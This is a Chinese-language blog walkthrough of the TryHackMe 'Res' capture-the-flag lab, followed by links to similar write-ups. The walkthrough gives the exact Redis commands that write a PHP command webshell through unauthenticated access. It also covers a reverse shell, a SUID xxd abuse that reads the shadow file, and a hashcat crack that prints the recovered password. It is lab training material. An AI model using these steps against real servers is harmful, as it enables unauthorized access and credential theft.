TryHackMe - Res靶场

最新推荐文章于 2024-04-18 11:37:29 发布
最新推荐文章于 2024-04-18 11:37:29 发布
阅读量481 收藏
点赞数 1
分类专栏: Try Hack Me靶机 文章标签: 渗透测试 信息安全 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44101248/article/details/114834631
版权

Res(Redis未授权利用)

Hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

0x01 信息收集

Nmap扫描目标机器开放端口信息,6379开放明显就是redis数据库。首先想到的就是redis未授权。
 

0x02 漏洞利用

用redis-cli连接目标机试试,info成功枚举出信息
 
目标机还开放了80端口,尝试写入WebSehll。先写个phpinfo()测试下
 
成功解析phpinfo。
 

0x03 GetShell

接下来就是写入WebShell
1.设置web路径
config set dir /var/www/html
 
2.设置shell文件名
config set dbfilename shell.php
 
3.向数据库插入payload
set test "<?php system($_GET['cmd']);?>"
 
4.保存webshell
save
 
测试读取一下passwd文件
 
还是老套路:用kali自带的webshell文件,在/usr/share/webshells/php/php-reverse-shell.php
把文件用python搭建网站传输到目标机器上
 
攻击机上起监听,访问shell文件便成功弹回shell
 

0x04 获取Flag

先查看user用户的flag
 
find / -perm -4000 2>/dev/null
查询一下有SUID权限的文件,这里xxd有权限
 
https://gtfobins.github.io/gtfobins/xxd/#suid查询一下具体用法
 
读取root flag。本来到这里就差不多完了。但是靶机非得提交vianka的密码。
 

0x05 ROOT权限

成功读取shadow文件,获得hash
 
用hashcat爆破一下
hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
获得密码:beautiful1
 
直接一路su到root
 
z4yn:)
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
安卓编译工具framework-res.apk
01-06
安卓编译工具framework-res.apk
TryHackMe - magician靶场
z4yn:)的博客
03-12 234
magician CVE-2016–3714 This magical website lets you convert image file formats 0x01 信息收集 Nmap扫描端口开放服务,开放了21,8080,8081端口 根据靶场提示要把ip指向域名:magician 0x02 漏洞利用(CVE-2016–3714) 先访问21端口,有个匿名访问,被做了点手脚“延迟”。登录进去里面是空的,根据提示访问https://imagetragick.com. 根据给的..
tryhackme靶场: Mr Robot CTF
m0_64348326的博客
06-20 217
6.再来爆破出密码,这里字典太长且有很多数据重复,直接查看这部分的结果,在第八万多条的。8.根据选项面版RCE描述的方法,主题编辑器右侧找到404页面,添加。搭建的博客站登陆页面,根据登陆时的报错回显,利用下载的字典和。按照最新版的burp社区版爆破速度,估计要爆破到靶机结束。解密,但是还是得付费。需要收费,只能手动搜索了。,由于Linux系统的问题后面不需要再加。工具配合默认字典进行目录扫描,结果中的。7.进入后台后,准备查找历史漏洞,但是。命令,发现要输入密码,读取目录下的。命令开出bash命令窗。
vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
最新发布
没有故事
04-18 600
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。输入网址和端口,点击OK。
TryHackMe - Source靶场
z4yn:)的博客
02-09 280
Source(Webmin) Exploit a recent vulnerability and hack Webmin, a web-based system configuration tool. ##0x01 信息收集 利用Namp扫描端口,只开放了22,10000端口,切入点应该是10000端口 访问10000端口是个Webmin的登录页面,试了一下账号爆破均不行 ##0x02 寻找EXP 搜索一下公开的漏洞,看到MSF上集成有许多个RCE的EXP ...
Tryhackme - Retro
冬萍子癸水
05-28 1106
1 扫描 80进网页搜集信息,3389是远程控制端口 可以xfreerdp /u:wade /v:10.10.140.239然后远程控制桌面。但是要知道密码。或者用别的方法登进去。 C:\root> masscan -p1-65535,U:1-65535 10.10.140.239 --rate=1000 -e tun0 Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-05-28 00:41:40 GMT -- forced optio
TRY HACK ME | Hack Park 「Hydra+Winpeas」
AKAHRZ的博客
04-23 3555
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell提权」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellTA.
framework-res.apk
06-01
framework-res.apk反编译后的资源文件,使用系统自带的资源文件,让你的应用轻松瘦身!
minigui-res.zip
02-17
这是build-minigui-3.2里面的minigui-res,因为不能上传较大的文件,因此build-minigui-3.2和minigui-res分开上传了
cordova-res:本地Cordova Iconsplash屏幕资源生成工具
04-29
cordova-res是为与Cordova一起使用而开发的,但是支持Capacitor和其他本机运行时。 安装 $ npm install -g cordova-res 用法 cordova-res期望Cordova项目的结构如下: resources/ ├── icon.png └── splash....
TryHackMe - Fowsniff CTF靶场
z4yn:)的博客
03-03 367
Fowsniff CTF Hack this machine and get the flag. 0x01 信息收集 先用Nmap工具对目标进行端口服务探测 打开Web服务扫一遍目录没有发现有价值的线索。但分析端口应该突破口为110端口的邮箱服务。 搜索一下名为fowsniff的公司,第一条为推特 点进去能看到有个介绍说这个是靶场的一部分,随后贴了一个pastebin.com的链接。 跟随链接跳转可以访问到一个带有邮箱账号密码的文件 ...
TryHackMe - Dav靶场
z4yn:)的博客
03-12 260
Dav boot2root machine for FIT and bsides guatemala CTF 0x01 信息收集 常规Nmap扫描目标机器收集端口开放服务信息,只开放了一个端口 0x02 漏洞利用 接着就是网站目录扫描,用dirbuster扫描得到一个目录/webdav 搜索对应的文章看看:https://www.bilibili.com/read/cv4917037/ 上面写到可疑用cadaver 登录到服务。默认用户名是wampp,密码是xampp 登录成功 ..
Tryhackme-Kenobi靶机
MSB_WLAQ的博客
10-06 478
前言 一个国外的渗透学习网站,补基础知识点还是不错的,适合新人学习网络安全(因为学习项目里有提示)。 知识点 可直接开启web的虚拟机[非会员每天只有一个小时],也可以使用VPN连接(个人建议还是用VPN爽点,毕竟自己的机子工具啥的用起来方便)。 samba Samba是适用于和Unix的标准Windows互操作性程序套件。它允许最终用户访问和使用公司内联网或互联网上的文件、打印机和其他常见共享资源。它通常被称为网络文件系统。 Samba基于服务器消息块 (SMB) 的通用客户端/服.
tryhackme之Hydra
qq_43200143的博客
10-09 334
tryhackme之Hydra一、Hydra是什么?二、使用方法1.ftp2.ssh3.提交web表单三、解题1、Use Hydra to bruteforce molly's web password. What is flag 1?2、Use Hydra to bruteforce molly's SSH password. What is flag 2? 一、Hydra是什么? 二、使用方法 1.ftp FTP:hydra -l user -P passlist.txt ftp://machine_
TryHackMe学习笔记-Windows PrivEsc Arena
网安星空
09-20 839
通过靶机练习常见的Windows系统提权手法
TryHackMe学习笔记-Buffer Overflow Prep
网安星空
12-18 1440
TryHackMe靶场联系,PWN与逆向课程系列,Windows环境下的缓冲区溢出,也是OSCP教程的内容之一
TRY HACK ME| BLUE 永恒之蓝
AKAHRZ的博客
03-26 2528
永恒之蓝(EternalBlue)是美国国家安全局开发的漏洞利用程序,于2017年4月14日被黑客组织影子掮客泄漏。该工具利用445/TCP端口的文件分享协议的漏洞进行散播。
Redis数据库的漏洞靶场演练
weixin_42282189的博客
01-10 1067
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 以前只知道redis有未授权访问,redis未授权访问的利用看文章,但自己没有亲手做过,最近接触了一个postgresql的远程命令执行漏洞,我在数据库漏洞利用这块不熟悉,信安之路最近开了数据库的课程,在此记录数据库靶场演练的学习,并分享给大家。 0x02 数据库的安装 2.1 redis安装 下载地址: https://github.com/microsoftarchive/redis/rel.
ssrf+redis未授权靶场
actistsec的博客
10-25 1828
自己搭建不太合理的ssrf联动redis未授权
cmd 安装Cordova-res
05-19
要在 cmd 中安装 Cordova-res,需要先安装 Node.js 和 npm。 1. 首先,下载并安装 Node.js,可以在官网(https://nodejs.org/)下载对应版本的安装包。 2. 安装完成后,打开 cmd,输入以下命令来检查 Node.js 和 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值